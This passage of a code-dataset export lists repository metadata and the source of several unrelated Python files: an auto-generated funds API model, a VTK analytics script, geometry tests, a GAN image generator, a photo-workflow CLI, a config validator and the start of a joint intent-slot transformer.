hexsha
stringlengths 40
40
| size
int64 4
1.02M
| ext
stringclasses 8
values | lang
stringclasses 1
value | max_stars_repo_path
stringlengths 4
209
| max_stars_repo_name
stringlengths 5
121
| max_stars_repo_head_hexsha
stringlengths 40
40
| max_stars_repo_licenses
listlengths 1
10
| max_stars_count
int64 1
191k
⌀ | max_stars_repo_stars_event_min_datetime
stringlengths 24
24
⌀ | max_stars_repo_stars_event_max_datetime
stringlengths 24
24
⌀ | max_issues_repo_path
stringlengths 4
209
| max_issues_repo_name
stringlengths 5
121
| max_issues_repo_head_hexsha
stringlengths 40
40
| max_issues_repo_licenses
listlengths 1
10
| max_issues_count
int64 1
67k
⌀ | max_issues_repo_issues_event_min_datetime
stringlengths 24
24
⌀ | max_issues_repo_issues_event_max_datetime
stringlengths 24
24
⌀ | max_forks_repo_path
stringlengths 4
209
| max_forks_repo_name
stringlengths 5
121
| max_forks_repo_head_hexsha
stringlengths 40
40
| max_forks_repo_licenses
listlengths 1
10
| max_forks_count
int64 1
105k
⌀ | max_forks_repo_forks_event_min_datetime
stringlengths 24
24
⌀ | max_forks_repo_forks_event_max_datetime
stringlengths 24
24
⌀ | content
stringlengths 4
1.02M
| avg_line_length
float64 1.07
66.1k
| max_line_length
int64 4
266k
| alphanum_fraction
float64 0.01
1
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
441ba79bc36f9e4d678028c705cdcb40a02e9d38
| 13,360
|
py
|
Python
|
code/python/FundsAPIforDigitalPortals/v2/fds/sdk/FundsAPIforDigitalPortals/model/fund_notation_screener_search_data_validation_prices.py
|
factset/enterprise-sdk
|
3fd4d1360756c515c9737a0c9a992c7451d7de7e
|
[
"Apache-2.0"
] | 6
|
2022-02-07T16:34:18.000Z
|
2022-03-30T08:04:57.000Z
|
code/python/FundsAPIforDigitalPortals/v2/fds/sdk/FundsAPIforDigitalPortals/model/fund_notation_screener_search_data_validation_prices.py
|
factset/enterprise-sdk
|
3fd4d1360756c515c9737a0c9a992c7451d7de7e
|
[
"Apache-2.0"
] | 2
|
2022-02-07T05:25:57.000Z
|
2022-03-07T14:18:04.000Z
|
code/python/FundsAPIforDigitalPortals/v2/fds/sdk/FundsAPIforDigitalPortals/model/fund_notation_screener_search_data_validation_prices.py
|
factset/enterprise-sdk
|
3fd4d1360756c515c9737a0c9a992c7451d7de7e
|
[
"Apache-2.0"
] | null | null | null |
"""
Funds API For Digital Portals
Search for mutual funds and ETFs using one single consolidated API, including a criteria-based screener. The API provides also base data, key figures, and holdings. A separate endpoint returns the possible values and value range for the parameters that the endpoint /fund/notation/screener/search accepts: Application developers can request the values and value range only for a restricted set of notations that match predefined parameters. This functionality may be used to pre-fill the values and value ranges of the parameters of the /fund/notation/screener/search endpoint so that performing a search always leads to a non-empty set of notations. This API is fully integrated with the corresponding Quotes API, allowing access to detailed price and performance information of instruments, as well as basic security identifier cross-reference. For direct access to price histories, please refer to the Time Series API for Digital Portals. Similar criteria based screener APIs exist for equity instruments and securitized derivatives: See the Stocks API and the Securitized Derivatives API for details. # noqa: E501
The version of the OpenAPI document: 2
Generated by: https://openapi-generator.tech
"""
import re # noqa: F401
import sys # noqa: F401
from fds.sdk.FundsAPIforDigitalPortals.model_utils import ( # noqa: F401
ApiTypeError,
ModelComposed,
ModelNormal,
ModelSimple,
cached_property,
change_keys_js_to_python,
convert_js_args_to_python_args,
date,
datetime,
file_type,
none_type,
validate_get_composed_info,
OpenApiModel
)
from fds.sdk.FundsAPIforDigitalPortals.exceptions import ApiAttributeError
def lazy_import():
from fds.sdk.FundsAPIforDigitalPortals.model.fund_notation_screener_search_data_validation_prices_latest import FundNotationScreenerSearchDataValidationPricesLatest
from fds.sdk.FundsAPIforDigitalPortals.model.fund_notation_screener_search_data_validation_prices_previous import FundNotationScreenerSearchDataValidationPricesPrevious
globals()['FundNotationScreenerSearchDataValidationPricesLatest'] = FundNotationScreenerSearchDataValidationPricesLatest
globals()['FundNotationScreenerSearchDataValidationPricesPrevious'] = FundNotationScreenerSearchDataValidationPricesPrevious
class FundNotationScreenerSearchDataValidationPrices(ModelNormal):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
Attributes:
allowed_values (dict): The key is the tuple path to the attribute
and the for var_name this is (var_name,). The value is a dict
with a capitalized key describing the allowed value and an allowed
value. These dicts store the allowed enum values.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
discriminator_value_class_map (dict): A dict to go from the discriminator
variable value to the discriminator class name.
validations (dict): The key is the tuple path to the attribute
and the for var_name this is (var_name,). The value is a dict
that stores validations for max_length, min_length, max_items,
min_items, exclusive_maximum, inclusive_maximum, exclusive_minimum,
inclusive_minimum, and regex.
additional_properties_type (tuple): A tuple of classes accepted
as additional properties values.
"""
allowed_values = {
}
validations = {
}
@cached_property
def additional_properties_type():
"""
This must be a method because a model may have properties that are
of type self, this must run after the class is loaded
"""
lazy_import()
return (bool, date, datetime, dict, float, int, list, str, none_type,) # noqa: E501
_nullable = False
@cached_property
def openapi_types():
"""
This must be a method because a model may have properties that are
of type self, this must run after the class is loaded
Returns
openapi_types (dict): The key is attribute name
and the value is attribute type.
"""
lazy_import()
return {
'latest': (FundNotationScreenerSearchDataValidationPricesLatest,), # noqa: E501
'previous': (FundNotationScreenerSearchDataValidationPricesPrevious,), # noqa: E501
}
@cached_property
def discriminator():
return None
attribute_map = {
'latest': 'latest', # noqa: E501
'previous': 'previous', # noqa: E501
}
read_only_vars = {
}
_composed_schemas = {}
@classmethod
@convert_js_args_to_python_args
def _from_openapi_data(cls, *args, **kwargs): # noqa: E501
"""FundNotationScreenerSearchDataValidationPrices - a model defined in OpenAPI
Keyword Args:
_check_type (bool): if True, values for parameters in openapi_types
will be type checked and a TypeError will be
raised if the wrong type is input.
Defaults to True
_path_to_item (tuple/list): This is a list of keys or values to
drill down to the model in received_data
when deserializing a response
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_configuration (Configuration): the instance to use when
deserializing a file_type parameter.
If passed, type conversion is attempted
If omitted no type conversion is done.
_visited_composed_classes (tuple): This stores a tuple of
classes that we have traveled through so that
if we see that class again we will not use its
discriminator again.
When traveling through a discriminator, the
composed schema that is
is traveled through is added to this set.
For example if Animal has a discriminator
petType and we pass in "Dog", and the class Dog
allOf includes Animal, we move through Animal
once using the discriminator, and pick Dog.
Then in Dog, we will make an instance of the
Animal class but this time we won't travel
through its discriminator because we passed in
_visited_composed_classes = (Animal,)
latest (FundNotationScreenerSearchDataValidationPricesLatest): [optional] # noqa: E501
previous (FundNotationScreenerSearchDataValidationPricesPrevious): [optional] # noqa: E501
"""
_check_type = kwargs.pop('_check_type', True)
_spec_property_naming = kwargs.pop('_spec_property_naming', False)
_path_to_item = kwargs.pop('_path_to_item', ())
_configuration = kwargs.pop('_configuration', None)
_visited_composed_classes = kwargs.pop('_visited_composed_classes', ())
self = super(OpenApiModel, cls).__new__(cls)
if args:
raise ApiTypeError(
"Invalid positional arguments=%s passed to %s. Remove those invalid positional arguments." % (
args,
self.__class__.__name__,
),
path_to_item=_path_to_item,
valid_classes=(self.__class__,),
)
self._data_store = {}
self._check_type = _check_type
self._spec_property_naming = _spec_property_naming
self._path_to_item = _path_to_item
self._configuration = _configuration
self._visited_composed_classes = _visited_composed_classes + (self.__class__,)
for var_name, var_value in kwargs.items():
if var_name not in self.attribute_map and \
self._configuration is not None and \
self._configuration.discard_unknown_keys and \
self.additional_properties_type is None:
# discard variable.
continue
setattr(self, var_name, var_value)
return self
required_properties = set([
'_data_store',
'_check_type',
'_spec_property_naming',
'_path_to_item',
'_configuration',
'_visited_composed_classes',
])
@convert_js_args_to_python_args
def __init__(self, *args, **kwargs): # noqa: E501
"""FundNotationScreenerSearchDataValidationPrices - a model defined in OpenAPI
Keyword Args:
_check_type (bool): if True, values for parameters in openapi_types
will be type checked and a TypeError will be
raised if the wrong type is input.
Defaults to True
_path_to_item (tuple/list): This is a list of keys or values to
drill down to the model in received_data
when deserializing a response
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_configuration (Configuration): the instance to use when
deserializing a file_type parameter.
If passed, type conversion is attempted
If omitted no type conversion is done.
_visited_composed_classes (tuple): This stores a tuple of
classes that we have traveled through so that
if we see that class again we will not use its
discriminator again.
When traveling through a discriminator, the
composed schema that is
is traveled through is added to this set.
For example if Animal has a discriminator
petType and we pass in "Dog", and the class Dog
allOf includes Animal, we move through Animal
once using the discriminator, and pick Dog.
Then in Dog, we will make an instance of the
Animal class but this time we won't travel
through its discriminator because we passed in
_visited_composed_classes = (Animal,)
latest (FundNotationScreenerSearchDataValidationPricesLatest): [optional] # noqa: E501
previous (FundNotationScreenerSearchDataValidationPricesPrevious): [optional] # noqa: E501
"""
_check_type = kwargs.pop('_check_type', True)
_spec_property_naming = kwargs.pop('_spec_property_naming', False)
_path_to_item = kwargs.pop('_path_to_item', ())
_configuration = kwargs.pop('_configuration', None)
_visited_composed_classes = kwargs.pop('_visited_composed_classes', ())
if args:
raise ApiTypeError(
"Invalid positional arguments=%s passed to %s. Remove those invalid positional arguments." % (
args,
self.__class__.__name__,
),
path_to_item=_path_to_item,
valid_classes=(self.__class__,),
)
self._data_store = {}
self._check_type = _check_type
self._spec_property_naming = _spec_property_naming
self._path_to_item = _path_to_item
self._configuration = _configuration
self._visited_composed_classes = _visited_composed_classes + (self.__class__,)
for var_name, var_value in kwargs.items():
if var_name not in self.attribute_map and \
self._configuration is not None and \
self._configuration.discard_unknown_keys and \
self.additional_properties_type is None:
# discard variable.
continue
setattr(self, var_name, var_value)
if var_name in self.read_only_vars:
raise ApiAttributeError(f"`{var_name}` is a read-only attribute. Use `from_openapi_data` to instantiate "
f"class with read only attributes.")
| 49.850746
| 1,125
| 0.617141
|
c3022c11b35f7d1a8e5a6a63f6fa5e42802f5d20
| 3,503
|
py
|
Python
|
tests/movingGridMultiDisk/analytics.py
|
wangzhezhe/observerchain
|
faa8fb9d845a2720704538f01e1e7597083d4510
|
[
"MIT"
] | null | null | null |
tests/movingGridMultiDisk/analytics.py
|
wangzhezhe/observerchain
|
faa8fb9d845a2720704538f01e1e7597083d4510
|
[
"MIT"
] | null | null | null |
tests/movingGridMultiDisk/analytics.py
|
wangzhezhe/observerchain
|
faa8fb9d845a2720704538f01e1e7597083d4510
|
[
"MIT"
] | null | null | null |
from mpi4py import MPI
import numpy as np
import ctypes
import os
import time
import math
import timeit
import sys
import vtk
from vtk.util import numpy_support as VN
sys.path.append('../../src/publishclient/pythonclient')
import pubsub as pubsubclient
#comm = MPI.COMM_WORLD
#rank = comm.Get_rank()
# input the coordinate of the points and return the index of grid in array
initp = 1.5
targetValue = 7.5
def sendEventToPubSub(ts):
addrList = pubsubclient.getServerAddr()
print (addrList)
addr = addrList[0]
eventList = ["dataPattern_1"]
# this shoule be deleted
clientId = "test" + "_" + str(ts)
metainfo = "GRID[<-1,-1>:<-1,-1>]%TS["+str(ts)+"]"
matchtype = "NAME"
pubsubclient.publishEventList(addr,eventList,clientId,metainfo,matchtype)
def getIndex(px, py, pz):
# TODO should add all boundry case
# only for lower case
r = 15
gridnum = 15
deltar = 1.0*r/gridnum
return pz*15*15+py*15+px
def checkAndPublishEvent(gridDataArray_p1, gridDataArray_p2):
coord1 = []
coord2 = []
# get the index of red block in data 1
# print("caculate coord1")
break_flag=False
for x in range(15):
if(break_flag==True):
break
for y in range (15):
if(break_flag==True):
break
for z in range (15):
index = getIndex(x,y,z)
if (gridDataArray_p1[index]==targetValue):
coord1 = [x,y,z]
break_flag=True
#print(coord1)
break
# get the index of the red block in data 2
#print("caculate coord2")
break_flag=False
for x in range(15):
if(break_flag==True):
break
for y in range (15):
if(break_flag==True):
break
for z in range (15):
index = getIndex(x,y,z)
if (gridDataArray_p2[index]==targetValue):
coord2 = [x,y,z]
break_flag=True
#print(coord2)
break
distance = pow((coord2[0]-coord1[0]),2)+pow((coord2[1]-coord1[1]),2)+pow((coord2[2]-coord1[2]),2)
#print(distance)
if(distance>140 and distance<150):
return True
else:
return False
def getDataFromDisk(ts):
# range the iteration
# get data1
reader = vtk.vtkXMLImageDataReader()
file_0 = "image_rank0"+"/"+"image"+str(ts)+ ".vti"
reader.SetFileName(file_0)
reader.Update()
pressuredata0 = reader.GetOutput().GetCellData().GetArray('pressure')
data0 = VN.vtk_to_numpy(pressuredata0)
file_1 = "image_rank1"+"/"+"image"+str(ts) + ".vti"
#print(file_1)
reader.SetFileName(file_1)
reader.Update()
pressuredata1 = reader.GetOutput().GetCellData().GetArray('pressure')
data1 = VN.vtk_to_numpy(pressuredata1)
return data0, data1
if (len(sys.argv)!=2):
print("analytics <iteration>")
exit(0)
iteration = int(sys.argv[1])
startanay = timeit.default_timer()
for ts in range (iteration):
print("current ts %d"%(ts))
data1, data2 = getDataFromDisk(ts)
# check data1 data2
#print("get data1")
#print (data1)
#print("get data2")
#print (data2)
patternHeppen = checkAndPublishEvent(data1,data2)
if(patternHeppen==True):
print("patternHeppen at ts %d"%(ts))
break
endanay = timeit.default_timer()
print("time span")
print(endanay-startanay)
| 23.198675
| 101
| 0.599201
|
74fc2028cea525b823b293ec9a4ca020c6d91655
| 4,465
|
py
|
Python
|
src/model.py
|
HenrySilvaCS/esotericpainter
|
e510e8e4fadf83979eeb9f1d8e85ce20f0a0ddf8
|
[
"Unlicense"
] | null | null | null |
src/model.py
|
HenrySilvaCS/esotericpainter
|
e510e8e4fadf83979eeb9f1d8e85ce20f0a0ddf8
|
[
"Unlicense"
] | null | null | null |
src/model.py
|
HenrySilvaCS/esotericpainter
|
e510e8e4fadf83979eeb9f1d8e85ce20f0a0ddf8
|
[
"Unlicense"
] | null | null | null |
import torch
import torch.nn as nn
from torchvision.utils import make_grid
from torchvision.utils import save_image
from torchvision import transforms
import matplotlib.pyplot as plt
import os
from random_word import RandomWords
import random
BASEDIR = os.getcwd() + "/"
DATADIR = BASEDIR + "random_generated_images/"
MODELSDIR = BASEDIR + "model_parameters/"
os.makedirs(DATADIR,exist_ok=True)
os.makedirs(MODELSDIR,exist_ok=True)
stats = (0.5, 0.5, 0.5), (0.5, 0.5, 0.5)
def get_default_device():
"""Pick GPU if available, else CPU"""
if torch.cuda.is_available():
return torch.device('cuda')
else:
return torch.device('cpu')
def to_device(data, device):
"""Move tensor(s) to chosen device"""
if isinstance(data, (list,tuple)):
return [to_device(x, device) for x in data]
return data.to(device, non_blocking=True)
def denorm(img_tensors):
return img_tensors * stats[1][0] + stats[0][0]
def save_image(images,nmax=128,show_images=False,return_path=False):
fig, ax = plt.subplots(figsize=(8, 8))
ax.set_xticks([]); ax.set_yticks([])
ax.imshow(make_grid(denorm(images.detach()), nrow=8).permute(1, 2, 0))
random_name = RandomWords().get_random_word()
print(f"File saved at:{DATADIR + random_name}.png")
plt.savefig(DATADIR + f"{random_name}.png")
if show_images:
plt.show()
if return_path:
return DATADIR + random_name + ".png"
class GEHENNUM:
def __init__(self,latent_dim=128):
self.latent_dim = latent_dim
self.stats = stats
self.discriminator = nn.Sequential(
# in: 3 x 64 x 64
nn.Conv2d(3, 64, kernel_size=4, stride=2, padding=1, bias=False),
nn.BatchNorm2d(64),
nn.LeakyReLU(0.2, inplace=True),
# out: 64 x 32 x 32
nn.Conv2d(64, 128, kernel_size=4, stride=2, padding=1, bias=False),
nn.BatchNorm2d(128),
nn.LeakyReLU(0.2, inplace=True),
# out: 128 x 16 x 16
nn.Conv2d(128, 256, kernel_size=4, stride=2, padding=1, bias=False),
nn.BatchNorm2d(256),
nn.LeakyReLU(0.2, inplace=True),
# out: 256 x 8 x 8
nn.Conv2d(256, 512, kernel_size=4, stride=2, padding=1, bias=False),
nn.BatchNorm2d(512),
nn.LeakyReLU(0.2, inplace=True),
# out: 512 x 4 x 4
nn.Conv2d(512, 1, kernel_size=4, stride=1, padding=0, bias=False),
# out: 1 x 1 x 1
nn.Flatten(),
nn.Sigmoid())
self.generator = nn.Sequential(
# in: latent_size x 1 x 1
nn.ConvTranspose2d(128, 512, kernel_size=4, stride=1, padding=0, bias=False),
nn.BatchNorm2d(512),
nn.ReLU(True),
# out: 512 x 4 x 4
nn.ConvTranspose2d(512, 256, kernel_size=4, stride=2, padding=1, bias=False),
nn.BatchNorm2d(256),
nn.ReLU(True),
# out: 256 x 8 x 8
nn.ConvTranspose2d(256, 128, kernel_size=4, stride=2, padding=1, bias=False),
nn.BatchNorm2d(128),
nn.ReLU(True),
# out: 128 x 16 x 16
nn.ConvTranspose2d(128, 64, kernel_size=4, stride=2, padding=1, bias=False),
nn.BatchNorm2d(64),
nn.ReLU(True),
# out: 64 x 32 x 32
nn.ConvTranspose2d(64, 3, kernel_size=4, stride=2, padding=1, bias=False),
nn.Tanh()
# out: 3 x 64 x 64
)
self.device = get_default_device()
self.discriminator = to_device(self.discriminator,self.device)
self.generator = to_device(self.generator,self.device)
self.generator.load_state_dict(torch.load(MODELSDIR + f"gehennum_generator.ckpt"))
self.discriminator.load_state_dict(torch.load(MODELSDIR + f"gehennum_discriminator.ckpt"))
def generate_image(self,save_img = True):
noise = torch.randn(128, self.latent_dim, 1, 1)
images = self.generator.forward(noise.to(self.device))
logits = self.discriminator.forward(images)
best_img_idx = int(torch.argmax(logits).to("cpu"))
if(save_img):
save_image(images[best_img_idx,:,:,:].to("cpu"))
return images[best_img_idx,:,:,:].to("cpu")
def main():
print("Generating image...")
gehennum = GEHENNUM()
img = gehennum.generate_image()
print("Done!")
if __name__ == "__main__":
main()
| 34.882813
| 98
| 0.606271
|
2e7b5bc37e2df0ffe1b63c1db29d516ab0e0da50
| 1,352
|
py
|
Python
|
tests/geometry/test_analytical.py
|
adacko/compas
|
47c443ad3825897ec7ed932ec20734c2f08ef120
|
[
"MIT"
] | null | null | null |
tests/geometry/test_analytical.py
|
adacko/compas
|
47c443ad3825897ec7ed932ec20734c2f08ef120
|
[
"MIT"
] | null | null | null |
tests/geometry/test_analytical.py
|
adacko/compas
|
47c443ad3825897ec7ed932ec20734c2f08ef120
|
[
"MIT"
] | 1
|
2022-01-16T02:32:43.000Z
|
2022-01-16T02:32:43.000Z
|
import pytest
from compas.geometry import circle_evaluate
from compas.geometry import ellipse_evaluate
from compas.geometry import archimedean_spiral_evaluate
from compas.geometry import logarithmic_spiral_evaluate
from compas.geometry import helix_evaluate
from math import pi
def test_circle():
threshold = 1e-6
x, y, z = circle_evaluate(0, 1, 0)
assert x == 1 and y == 0 and z == 0
x, y, z = circle_evaluate(0, 1, 1)
assert x == 1 and y == 0 and z == 1
x, y, z = circle_evaluate(pi / 2, 1, 0)
assert x < threshold and x > -threshold and y == 1 and z == 0
x, y, z = circle_evaluate(0, 0, 0)
assert x == 0 and y == 0 and z == 0
x, y, z = circle_evaluate(0, -1, 0)
assert x == -1 and y == 0 and z == 0
def test_ellipse():
threshold = 1e-6
x, y, z = ellipse_evaluate(0, 1, 1, 0)
assert x == 1 and y == 0 and z == 0
x, y, z = ellipse_evaluate(0, 2, 1, 1)
assert x == 2 and y == 0 and z == 1
x, y, z = ellipse_evaluate(pi / 2, 1, 1, 0)
assert x < threshold and x > -threshold and y == 1 and z == 0
x, y, z = ellipse_evaluate(pi / 2, 1, 2, 0)
assert x < threshold and x > -threshold and y == 2 and z == 0
x, y, z = ellipse_evaluate(0, 0, 0, 0)
assert x == 0 and y == 0 and z == 0
x, y, z = ellipse_evaluate(0, -1, 1, 0)
assert x == -1 and y == 0 and z == 0
| 36.540541
| 65
| 0.599112
|
de85033fcef6ad0866cc53a04cba0e502b3324fc
| 6,414
|
py
|
Python
|
picturebot/cli.py
|
Tomekske/picturebot-legacy
|
5ca88b53d87bec769991f66ead60a30d6e5a006f
|
[
"MIT"
] | null | null | null |
picturebot/cli.py
|
Tomekske/picturebot-legacy
|
5ca88b53d87bec769991f66ead60a30d6e5a006f
|
[
"MIT"
] | 1
|
2021-11-15T17:49:06.000Z
|
2021-11-15T17:49:06.000Z
|
picturebot/cli.py
|
Tomekske/picturebot-legacy
|
5ca88b53d87bec769991f66ead60a30d6e5a006f
|
[
"MIT"
] | null | null | null |
"""Console script for picturebot."""
import sys
import os
import json
import shutil
import subprocess
import click
import picturebot as pb
from picturebot.helper import Helper as helper
import picturebot.poco as poco
import generalutils.guard as grd
import picturebot.workspace as ws
from picturebot.directory import Directory as directory
import picturebot.base as baseflow
import picturebot.flow as otherflow
import picturebot.shoot as sht
@click.group()
@click.pass_context
def main(context):
'''Main method where config data and workspace object are initialized
Args:
context (object): Global context object
'''
pathToConfig = helper.FullFilePath("config.json")
# Check whether the path to the confile exists
grd.Filesystem.PathExist(pathToConfig)
with open(pathToConfig) as f:
# if conext isn't initialized created a new dictionary
if context.obj is None:
context.obj = dict()
# Load data from file
data = json.load(f)
lstConfig = []
for d in data:
lstConfig.append(poco.Config(d['workspace'], d['workflow'], d['baseflow'], d['backup'], d['selection'], d['edited'], d['preview'], d['editing'], d['instagram']))
c = 1
# Load the config data in the context variable
#x = poco.Config(data['workspace'], data['workflow'], data['baseflow'], data['backup'], data['selection'], data['edited'], data['preview'], data['editing'], data['instagram'])
#context.obj['config'] = poco.Config(data[c]['workspace'], data[c]['workflow'], data[c]['baseflow'], data[c]['backup'], data[c]['selection'], data[c]['edited'], data[c]['preview'], data[c]['editing'], data[c]['instagram'])
context.obj['config'] = lstConfig
# Load the workspace object into the context variable
context.obj['workspaceObj'] = ws.Workspace(pathToConfig, context)
# print(data[1]['workspace'])
# print(context.obj['config'])
@main.command()
@click.option('--create', '-c', nargs=1, help='Create a new workspace')
@click.pass_context
def workspace(context, create):
'''Create a new workspace
Args:
context (object): Global context object
create (object): Create a new workspace
'''
ctx = helper.Context(context)
# Get the current working directory of where the script is executed
cwd = os.getcwd()
#Check whether the current working directory exists
grd.Filesystem.PathExist(cwd)
if create:
ctx.WorkspaceObj.Create(create[0])
@main.command()
@click.option('--backup', '-b', nargs=2, type=str, help='Make a copy of a picture in the backup flow')
@click.option('--massbackup', '-mb', nargs=1, type=str, help='Make a copy of all pictures within the base flow and copy them to the backup flow')
@click.option('--rename', '-r', nargs=3, type=str, help='Rename a picture within the baseflow accordingly to it\'s shootname')
@click.option('--hash', '-h', nargs=1, type=str, help='Hash rename a picture')
@click.option('--massrename', '-mr', nargs=1, help='Rename all pictures within the baseflow accordingly to it\'s shootname')
@click.option('--convert', '-c', nargs=3, type=str, help='Convert a raw picture within the base flow to a jpg format and store it within the preview flow')
@click.pass_context
def base(context, backup, massbackup, hash, rename, massrename, convert):
'''Method to backup files from the baseflow project
Args:
context (object): Global context object
backup (object): Make a copy of a picture in the backup flow
massbackup (object): Make a copy of all pictures within the base flow and copy them to the backup flow
rename (object): Rename a picture within the baseflow accordingly to it's shootname
massrename (object): Rename all pictures within the baseflow accordingly to it's shootname
convert (object): Convert a raw picture within the base flow to a jpg format and store it within the preview flow
'''
ctx = helper.Context(context)
if backup:
bs = baseflow.Base(ctx, backup[0])
bs.Backup(backup[1])
elif massbackup:
bs = baseflow.Base(ctx, massbackup[0])
bs.MassBackup()
elif hash:
bs = baseflow.Base(ctx, hash[0])
bs.HashRename()
elif rename:
bs = baseflow.Base(ctx, rename[0])
bs.Rename(rename[1], rename[2])
elif massrename:
bs = baseflow.Base(ctx, massrename[0])
bs.MassRename()
elif convert:
bs = baseflow.Base(ctx, convert[0])
bs.Convert(convert[1], convert[2])
@main.command()
@click.option('--show', '-s', is_flag=True, help='Open config file in an editor')
@click.option('--location', '-l', is_flag=True, help='Print config file location')
@click.option('--version', '-v', is_flag=True, help='Print picturebot script version')
@click.pass_context
def config(context, show, location, version):
'''CLI command that handles the configuration file operations
Args:
context (object): Global context object
view (object): Option that opens the configuration file
location (object): Option that prints the configuration file location within the filesystem
'''
ctx = helper.Context(context)
if show:
ctx.WorkspaceObj.ShowConfig()
elif location:
ctx.WorkspaceObj.PrintConfig()
elif version:
ctx.WorkspaceObj.Version()
@main.command()
@click.option('--completed', '-c', is_flag=True, help='View config file')
@click.option('--edited', '-e', is_flag=True, help='View config file')
@click.pass_context
def flow(context, completed, edited):
ctx = helper.Context(context)
fw = otherflow.Flow(ctx)
if completed:
fw.Completed()
elif edited:
fw.Edited()
@main.command()
@click.option('--new', '-n', nargs=3, type=str, help='Create a new shoot')
@click.pass_context
def shoot(context, new):
'''Shoot option allows modification of a shoot within the workspace
Args:
context (object): Global context object
new (object): Option to create a new shoot (<name> <date>)
'''
ctx = helper.Context(context)
if new:
newShoot = f'{new[1]} {new[2]}'
# Create a shoot object
s = sht.Shoot(ctx, new[0], newShoot)
# Creates the shoot
s.Create()
if __name__ == "__main__":
main() # pragma: no cover
| 36.651429
| 230
| 0.663704
|
246e9679df4bf65cbf2a60b5539ee180b1865bd8
| 735
|
py
|
Python
|
src/config/config.py
|
gregdurham/pyregistrator
|
d58172145d1c380cef1be85ee7eee30b6e93ccaa
|
[
"MIT"
] | null | null | null |
src/config/config.py
|
gregdurham/pyregistrator
|
d58172145d1c380cef1be85ee7eee30b6e93ccaa
|
[
"MIT"
] | 1
|
2015-10-11T02:07:51.000Z
|
2015-10-11T02:07:51.000Z
|
src/config/config.py
|
gregdurham/pyregistrator
|
d58172145d1c380cef1be85ee7eee30b6e93ccaa
|
[
"MIT"
] | null | null | null |
from pykwalify.core import Core
from pykwalify.errors import SchemaError
from pkg_resources import resource_filename
import logging
logging.basicConfig()
logging.getLogger("pykwalify").setLevel(logging.CRITICAL)
class Config(object):
def __init__(self, config):
self.config = config
def validate(self):
c = Core(source_data=self.config, schema_files=[resource_filename('pyregistrator', 'schemas/config.yaml')])
try:
c.validate(raise_exception=True)
except SchemaError, e:
raise RuntimeError("Configuration validation failed")
def get_paths(self):
return self.config.get("paths")
def get_commands(self):
return self.config.get("commands")
| 29.4
| 115
| 0.703401
|
03d0ea64d979652bf759e06f5b8fd3b3a6d6cea7
| 12,020
|
py
|
Python
|
PaperwithCode/1.Co-Interactive-Transformer/joint_model.py
|
techthiyanes/nlp-notebook
|
0e5f4b75e635128d4056c89a6c65bea60c15e836
|
[
"MIT"
] | 136
|
2021-04-18T12:03:55.000Z
|
2022-03-31T14:58:46.000Z
|
PaperwithCode/1.Co-Interactive-Transformer/joint_model.py
|
techthiyanes/nlp-notebook
|
0e5f4b75e635128d4056c89a6c65bea60c15e836
|
[
"MIT"
] | 3
|
2021-08-08T08:38:06.000Z
|
2022-03-26T17:17:40.000Z
|
PaperwithCode/1.Co-Interactive-Transformer/joint_model.py
|
techthiyanes/nlp-notebook
|
0e5f4b75e635128d4056c89a6c65bea60c15e836
|
[
"MIT"
] | 40
|
2021-05-18T06:55:37.000Z
|
2022-03-30T00:47:12.000Z
|
# -*- coding: utf-8 -*-
import torch
import torch.nn as nn
import torch.nn.functional as F
from crf import CRF
class Label_Attention(nn.Module):
def __init__(self, intent_emb, slot_emb):
# intent_emb:[n_class, hidden_dim]
# slot_emb:[n_tag, hidden_dim]
super(Label_Attention, self).__init__()
self.W_intent_emb = intent_emb.weight #[n_class, hidden_dim]
self.W_slot_emb = slot_emb.weight #[n_tag, hidden_dim]
def forward(self, input_intent, input_slot):
# input_intent:[batch size, seq len, hidden_dim]
# input_slot:[batch size, seq len, hidden_dim]
intent_score = torch.matmul(input_intent, self.W_intent_emb.t()) #[batch size, seq len, n_class]
slot_score = torch.matmul(input_slot, self.W_slot_emb.t()) #[batch size, seq len, n_tag]
intent_probs = nn.Softmax(dim=-1)(intent_score) #[batch size, seq len, n_class]
slot_probs = nn.Softmax(dim=-1)(slot_score) #[batch size, seq len, n_tag]
intent_res = torch.matmul(intent_probs, self.W_intent_emb) #[batch size, seq len, hidden_dim]
slot_res = torch.matmul(slot_probs, self.W_slot_emb) #[batch size, seq len, hidden_dim]
return intent_res, slot_res
class I_S_Block(nn.Module):
def __init__(self, hidden_size, n_heads, dropout, device):
super(I_S_Block, self).__init__()
self.I_S_Attention = I_S_SelfAttention(hidden_size, n_heads, dropout, device)
self.I_Out = SelfOutput(hidden_size, dropout)
self.S_Out = SelfOutput(hidden_size, dropout)
self.I_S_Feed_forward = Intermediate_I_S(hidden_size, dropout, device)
def forward(self, H_intent_input, H_slot_input, mask):
# H_intent_input: [batch size, seq len, hidden_dim]
# H_slot_input: [batch size, seq len, hidden_dim]
# mask: [batch size, seq len]
H_intent, H_slot = self.I_S_Attention(H_intent_input, H_slot_input, mask)
# H_intent: [batch size, seq len, hidden_dim]
# H_slot: [batch size, seq len, hidden_dim]
H_intent = self.I_Out(H_intent, H_intent_input) # [batch size, seq len, hidden_dim]
H_slot = self.S_Out(H_slot, H_slot_input) # [batch size, seq len, hidden_dim]
H_intent, H_slot = self.I_S_Feed_forward(H_intent, H_slot)
# H_intent: [batch size, seq len, hidden_dim]
# H_slot: [batch size, seq len, hidden_dim]
return H_intent, H_slot
class Intermediate_I_S(nn.Module):
def __init__(self, hidden_size, dropout, device):
super(Intermediate_I_S, self).__init__()
self.dense_in = nn.Linear(hidden_size * 6, hidden_size)
self.intermediate_act_fn = nn.ReLU()
self.dense_out = nn.Linear(hidden_size, hidden_size)
self.LayerNorm_I = nn.LayerNorm(hidden_size)
self.LayerNorm_S = nn.LayerNorm(hidden_size)
self.dropout = nn.Dropout(dropout)
self.device = device
def forward(self, hidden_states_I, hidden_states_S):
# hidden_states_I: [batch size, seq len, hidden_dim]
# hidden_states_S: [batch size, seq len, hidden_dim]
hidden_states_in = torch.cat([hidden_states_I, hidden_states_S], dim=2) # [batch size, seq len, hidden_dim*2]
batch_size, seq_length, hidden = hidden_states_in.size()
